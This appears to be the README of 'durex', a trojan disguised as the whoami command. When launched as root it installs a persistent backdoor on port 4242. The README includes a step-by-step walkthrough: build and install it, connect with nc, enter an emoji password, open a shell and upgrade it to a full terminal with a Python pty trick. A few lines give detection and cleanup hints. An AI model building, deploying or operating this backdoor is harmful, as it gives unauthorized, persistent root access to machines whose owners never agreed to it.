durex is a really simple trojan, disguised as `whoami`.
- It installs a backdoor when it is launched as root.
- The backdoor listens on port 4242 and is reachable with
nc <INFECTED_MACHINE_IP> 4242
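- Rebooting doesn't remove the backdoor: it stays installed until it is explicitly uninstalled, so a listener on port 4242 that is still there after a reboot is the simplest sign that a machine is infected.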
# Walkthrough: build, install, verify and uninstall durex, then exercise the
# backdoor on the local machine. The lines after `nc localhost 4242` are typed
# into the nc session, not run as local shell commands, until nc is suspended.

# Build durex (the Makefile's default target).
make
# Install durex (the Makefile's install target).
make install
# Check the installation.
make check
# Uninstall the backdoor. Rebooting does not remove it, so this is the
# cleanup step.
make reset
# Launch as root: this is the case that installs the backdoor.
sudo ./durex
# Launch without root: does nothing, no backdoor is installed.
./durex
# Connect to the backdoor on port 4242 of this machine with nc. The same port
# is what a remote client would connect to, so an unexpected listener on 4242
# is the thing to look for when checking a host.
nc localhost 4242
# Typed into the nc session: the password, a single unicorn emoji.
# NOTE(review): the password looks like the only access control on the
# listener -- confirm against the durex source.
🦄
# Typed into the nc session: the `shell` command, which launches a shell.
shell
# Enable xterm features in that shell: start bash on a pseudo-terminal through
# Python's pty module.
python -c "import pty;pty.spawn('/bin/bash')"
# Ctrl-Z, suspends nc and returns to the local shell.
^Z
# Run in the local shell while nc is suspended.
export term=XTERM
# Put the local terminal in raw mode with echo off, then bring nc back to the
# foreground.
stty raw -echo; fg